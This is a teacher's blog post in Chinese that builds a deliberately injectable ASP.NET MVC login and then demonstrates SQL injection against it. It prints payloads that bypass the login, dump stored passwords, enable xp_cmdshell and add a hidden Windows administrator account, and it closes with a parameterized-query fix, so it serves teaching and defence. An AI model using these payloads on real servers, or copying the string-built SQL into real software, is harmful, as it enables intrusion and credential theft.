前兩天，帶着學生們學習了簡單的ASP.NET MVC，通過ADO.NET方式連接數據庫，實現增刪改查。

 

可能有一部分學生提前預習過，在我寫登錄SQL的時候，他們鄙視我說：“老師你這SQL有注入，隨便都能登錄了。不能這么寫！”

 

“呦？小伙子這都知道了？那你說說看 啥是注入？注入只能拿來繞過登錄么？”

好吧，竟然在老子面前裝逼，看來不給你點兒顏色看看，你還真是不明白天有多高。。

 

於是乎。。哈哈。大清早的，輕松在班里裝了一手好逼。。

 

呵呵。不說了，下面我把那個項目重寫一下發上來吧。演示一下注入有哪些危害。怎么避免等。

 

(*^_^*) 大牛勿噴。

 

 

---

 ▁▃▅　淺談SQL注入風險 - 一個Login拿下Server　▅▃▁

---

 

目錄：

1. 數據庫
2. Web項目
3. 演示注入
4. 避免
5. 完了

 

 

　　本文主要就是介紹SQL注入基本手法，危害，以及如何解決。

　　技術有點渣渣，大牛勿噴。。。。

 

一、數據庫。

只創建了一個Admin表，結構如下：

create table Admin
(
  Id int primary key identity(1,1) not null,
  Username nvarchar(50) not null,
  Password nvarchar(50) not null
)
go

插入三條測試數據如下：

 

 

 

 

 

二、Web項目

這里為了演示，所以我只搭建了一個簡單的三層結構（ASP.NET MVC作為UI，DAL，BLL）以及模型Model：

 

1. Model模型層的AdminInfo.cs：

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

namespace Guying.BlogsDemo.Model
{
    /// <summary>
    /// Admin 模型
    /// </summary>
    public class AdminInfo
    {
        /// <summary>
        /// 編號
        /// </summary>
        public int Id { get; set; } 

        /// <summary>
        /// 賬號
        /// </summary>
        public string Username { get; set; }

        /// <summary>
        /// 密碼
        /// </summary>
        public string Password { get; set; }
    }
}

 

2. Web.config添加連接字符串：

    <connectionStrings>
      <add name="BlogDemo" connectionString="server=.;database=BlogDemo;uid=sa;pwd=LonelyShadow" providerName="System.Data.SqlClient"/>
    </connectionStrings>

 

3. DAL數據層的DBHelper.cs輔助類：

using System;
using System.Collections.Generic;
using System.Configuration;
using System.Linq;
using System.Text;

namespace Guying.BlogsDemo.DAL
{
    /// <summary>
    /// 數據訪問輔助類
    /// </summary>
    public class DBHelper
    {
        /// <summary>
        /// BlogDemo 數據庫鏈接字符串
        /// </summary>
        public static readonly string CONNECTIONSTRING = ConfigurationManager.ConnectionStrings["BlogDemo"].ConnectionString;
    }
}

 

4. DAL數據層的AdminService.cs中寫了一個登錄的Login方法（SQL存在注入）：

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Data.SqlClient;
using Guying.BlogsDemo.Model;

namespace Guying.BlogsDemo.DAL
{
    /// <summary>
    /// Admin 數據提供
    /// </summary>
    public class AdminService
    {
        /// <summary>
        /// Admin 登錄
        /// </summary>
        /// <param name="adminInfo">登錄目標對象</param>
        /// <returns>返回結果對象，null為登錄失敗</returns>
        public AdminInfo Login(AdminInfo adminInfo)
        {
            AdminInfo result = null;
            string sql = string.Format(" select Id,Username,Password from Admin where Username='{0}' and Password='{1}' ", adminInfo.Username, adminInfo.Password);
            using (SqlConnection conn = new SqlConnection(DBHelper.CONNECTIONSTRING))
            {
                conn.Open();
                using (SqlCommand comm = new SqlCommand(sql, conn))
                {
                    using (SqlDataReader reader = comm.ExecuteReader())
                    {
                        if (reader.Read())
                        {
                            result = new AdminInfo()
                            {
                                Id = (int)reader["Id"],
                                Username = reader["Username"].ToString(),
                                Password = reader["Password"].ToString()
                            };
                        }
                    }
                }
            }
            return result;
        }
    }
}

 

5. BLL業務邏輯的AdminManager.cs：

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Guying.BlogsDemo.DAL;
using Guying.BlogsDemo.Model;

namespace Guying.BlogsDemo.BLL
{
    public class AdminManager
    {
        private AdminService _AdminService = null;

        public AdminManager()
        {
            if (_AdminService==null)
            {
                _AdminService = new AdminService();
            }
        }

        /// <summary>
        /// Admin 登錄
        /// </summary>
        /// <param name="adminInfo">登錄目標對象</param>
        /// <returns>返回結果對象，null為登錄失敗</returns>
        public AdminInfo Login(AdminInfo adminInfo)
        {
            return _AdminService.Login(adminInfo);
        }
    }
}

 

6. WebUI層的HomeController：

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Mvc;
using Guying.BlogsDemo.Model;
using Guying.BlogsDemo.BLL;
using System.Text;

namespace Guying.BlogsDemo.WebUI.Controllers
{
    public class HomeController : Controller
    {
        [HttpGet]
        public ActionResult Login()
        {
            return View();
        }

        [HttpPost]
        public ActionResult Login(AdminInfo adminInfo)
        {
            AdminManager _AdminManager = new AdminManager();
            adminInfo = _AdminManager.Login(adminInfo);
            JsonResult json = new JsonResult() { Data = adminInfo, ContentEncoding = Encoding.UTF8 };
            return json;
        }

    }
}

 

7. WebUI的Views/Home/Login：

@model Guying.BlogsDemo.Model.AdminInfo

@{
    ViewBag.Title = "Login";
}

<link href="~/CSS/home.login.css" rel="stylesheet" />

<div class="box-max">
    <h2>Login</h2>
    <hr />

    @using (Html.BeginForm())
    {
        @Html.AntiForgeryToken()
        @Html.ValidationSummary(true)

        <table>
            <tr>
                <th>賬號：</th>
                <td>
                    @Html.EditorFor(model => model.Username)
                    @Html.ValidationMessageFor(model => model.Username)
                </td>
            </tr>
            <tr>
                <th>
                    密碼：
                </th>
                <td>
                    @Html.EditorFor(model => model.Password)
                    @Html.ValidationMessageFor(model => model.Password)
                </td>
            </tr>
            <tr>
                <td colspan="2" align="center">
                    <input type="submit" value="登 錄" />
                </td>
            </tr>
        </table>
    }
</div>

 

8. WebUIHome/Login的css：

*{transition:all 0.3s;}
body{margin:0px; padding:0px; background-color:#F8F8F8;}
.box-max{ width:500px; margin:100px auto; border:1px solid #CCC; padding:10px; border-radius:10px; background-color:#FFFFFF;}
.box-max table{width:100%;}
.box-max table tr{line-height:40px;}
.box-max table th{text-align:right;}
.box-max table td input{width:100%;}
.box-max table tr:last-child input{width:auto; padding:5px 10px; background-color:#FFF; border:1px solid black; border-radius:5px; cursor:pointer;}
.box-max table tr:last-child input:hover{background-color:#EFEFEF; text-decoration:underline;}

 

9. 運行結果：

 

 

 

 

 

三、注入

1. 廢話不多說、直接測試注入。

　　賬號： ' or 1=1 -- ，密碼(隨意)： fuck ，結果如下：

 

　　你還在認為注入只是為了繞過登錄進入網站么？

　　那你就錯了。

 

 

　　竟然返回的是一個包含整個用戶信息的Json？！

 

　　這也是一個程序設計的嚴重不當！

　　不知道大家前陣子還記得某酒店、某招聘網站，就是因為移動App，被人抓包，截取到了一個request，提交id，則會返回其所有基本信息。

　　最后導致千萬級數據泄露。

 

　　也就是類似於下面這樣操作：

 

2. 獲取所有用戶信息：

　　這里需要主鍵字段，我就不注入檢測了，假設我們已經測出了主鍵為ID。

　　那么我們可以登錄這樣寫(密碼隨意)：

　　賬號： ' or (1=1 and Id=1) -- ，返回結果： {"Id":1,"Username":"admin","Password":"admin1234"} ；

　　賬號： ' or (1=1 and Id=2) -- ，返回結果： {"Id":2,"Username":"zhangsan","Password":"666666"} ；

　　賬號： ' or (1=1 and Id=3) -- ，返回結果： {"Id":3,"Username":"lisi","Password":"888888"} 

 

　　如果我們寫一個程序，循環發送這個請求，將獲得的數據保存，那么你的用戶數據褲子是不是也要被脫得干干凈凈了？

 

3. 下一步，經典的開啟xp_cmdshell（看不懂的自行Google）：

　　賬號： ' or 1=1; exec sp_configure 'show advanced options',1; reconfigure; exec sp_configure 'xp_cmdshell',1; reconfigure; -- 

　　后面操作的結果就不用看了，也是返回前面登錄用戶的Json，但是已經成功執行后面的代碼了。

 

　　然后，xp_cmdshell已經獲取了，你還想干什么不行？

 

　　這里我只做一個概念性的測試，演示一下其危害。

　　根據項目的不同，注入可能還會導致更嚴重的后果。

 

　　當然，你也可以創建文件，添加任務等，例如這樣：

　　　　添加隱藏賬號，並提升管理員組：

　　　　賬號填寫： ' or 1=1; exec xp_cmdshell 'echo net user $fuck 123456 /add > D:\a.bat & echo net localgroup administrators $fuck /add >> D:\a.bat & echo exit >> D:\a.bat' -- 

　　　　

　　　　修改權限/修改所有者：

　　　　賬號填寫： ' or 1=1; exec xp_cmdshell 'icacls D:\a.bat /setowner everyone & icacls D:\a.bat /grant everyone:F' -- 

 

　　　　執行：

　　　　賬號填寫： ' or 1=1; exec xp_cmdshell 'D: & D:\a.bat' -- 

　　

　　結果：

　　

 

　　好吧，上面DOS你懂得。

 

　　當然，你還可以通過DOS xxxxxxxxxxxxxxxxxxxxxxxxxxxxx。。。

 

 

 

 

 

四、如何避免

這個應該很簡單吧，其實就是我們日常編碼習慣的問題。

 

登錄SQL可以改成通過SqlParameter傳參的方式，返回結果可以設置返回bool來標識成功/失敗，修改后的方法如下：

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Data.SqlClient;
using Guying.BlogsDemo.Model;

namespace Guying.BlogsDemo.DAL
{
    /// <summary>
    /// Admin 數據提供
    /// </summary>
    public class AdminService
    {
        /// <summary>
        /// Admin 登錄
        /// </summary>
        /// <param name="adminInfo">登錄目標對象</param>
        /// <returns>返回操作結果，true成功 / false失敗</returns>
        public bool Login(AdminInfo adminInfo)
        {
            int count = 0;
            string sql = " select count(1) from Admin where Username=@Username and Password=@Password ";
            using (SqlConnection conn = new SqlConnection(DBHelper.CONNECTIONSTRING))
            {
                conn.Open();
                using (SqlCommand comm = new SqlCommand(sql, conn))
                {
                    comm.Parameters.AddRange(new[] { new SqlParameter("@Username", adminInfo.Username), new SqlParameter("@Password", adminInfo.Password) });
                    count = (int)comm.ExecuteScalar();
                }
            }
            return count > 0;
        }
    }
}

 

　　平時寫代碼，多注意下這些問題。

 

　　當然，數據庫的存儲過程也不是沒卵用的咸魚，記得多用。

 

 

 

 

 

五、 沒了

就是演示一下危害，什么年代了都，不應該出現注入的問題了吧。

 

畢竟每個項目不一樣，指不定注入還會導致什么問題呢。

 

最后。。。。。。。。。。。大牛勿噴。么么噠~